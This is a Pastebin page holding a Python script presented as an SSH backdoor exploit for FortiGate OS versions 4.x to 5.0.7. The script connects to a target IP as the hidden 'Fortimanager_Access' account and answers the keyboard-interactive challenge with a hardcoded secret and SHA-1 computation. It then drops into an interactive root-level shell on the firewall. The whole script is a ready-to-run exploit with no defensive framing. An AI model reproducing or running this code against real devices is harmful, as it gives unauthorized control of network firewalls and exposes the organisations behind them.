API tools faq
paste
Advertisement
Guest User

fortigate.py

a guest
Dec 31st, 2018
160
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 2.28 KB | None | 0 0
raw download clone embed print report
  1. #!/usr/bin/env python
  2.  
  3. # SSH Backdoor for FortiGate OS Version 4.x up to 5.0.7
  4. # Usage: ./fgt_ssh_backdoor.py <target-ip>
  5. # After successfull login, you can try show ? or just ? will do the job.
  6. # Modified copy by @Zigoo0
  7. import socket
  8. import select
  9. import sys
  10. import paramiko
  11. #from paramiko.py3compat import u
  12. import base64
  13. import hashlib
  14. import termios
  15. import tty
  16.  
  17. def custom_handler(title, instructions, prompt_list):
  18.     n = prompt_list[0][0]
  19.     m = hashlib.sha1()
  20.     m.update('\x00' * 12)
  21.     m.update(n + 'FGTAbc11*xy+Qqz27')
  22.     m.update('\xA3\x88\xBA\x2E\x42\x4C\xB0\x4A\x53\x79\x30\xC1\x31\x07\xCC\x3F\xA1\x32\x90\x29\xA9\x81\x5B\x70')
  23.     h = 'AK1' + base64.b64encode('\x00' * 12 + m.digest())
  24.     print '[*] Generated Value: ', h
  25.     return [h]
  26.  
  27. def main():
  28.     if len(sys.argv) < 2:
  29.         print 'Usage: ' + sys.argv[0] + ' <target-ip>'
  30.         exit(-1)
  31.  
  32.     client = paramiko.SSHClient()
  33.     client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
  34.  
  35.     try:
  36.         client.connect(sys.argv[1], username='', allow_agent=False, look_for_keys=False)
  37.     except paramiko.ssh_exception.SSHException:
  38.         pass
  39.  
  40.     trans = client.get_transport()
  41.     try:
  42.         trans.auth_password(username='Fortimanager_Access', password='', event=None, fallback=True)
  43.     except paramiko.ssh_exception.AuthenticationException:
  44.         pass
  45.  
  46.     trans.auth_interactive(username='Fortimanager_Access', handler=custom_handler)
  47.     chan = client.invoke_shell()
  48.     oldtty = termios.tcgetattr(sys.stdin)
  49.     try:
  50.         tty.setraw(sys.stdin.fileno())
  51.         tty.setcbreak(sys.stdin.fileno())
  52.         chan.settimeout(0.0)
  53.  
  54.         while True:
  55.             r, w, e = select.select([chan, sys.stdin], [], [])
  56.             if chan in r:
  57.                 try:
  58.                     x = chan.recv(1024)
  59.                     if len(x) == 0:
  60.                         sys.stdout.write('\r\n*** EOF\r\n')
  61.                         break
  62.                     sys.stdout.write(x)
  63.                     sys.stdout.flush()
  64.                 except socket.timeout:
  65.                     pass
  66.             if sys.stdin in r:
  67.                 x = sys.stdin.read(1)
  68.                 if len(x) == 0:
  69.                     break
  70.                 chan.send(x)
  71.  
  72.     finally:
  73.         termios.tcsetattr(sys.stdin, termios.TCSADRAIN, oldtty)
  74.  
  75.  
  76. if __name__ == '__main__':
  77.     main()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!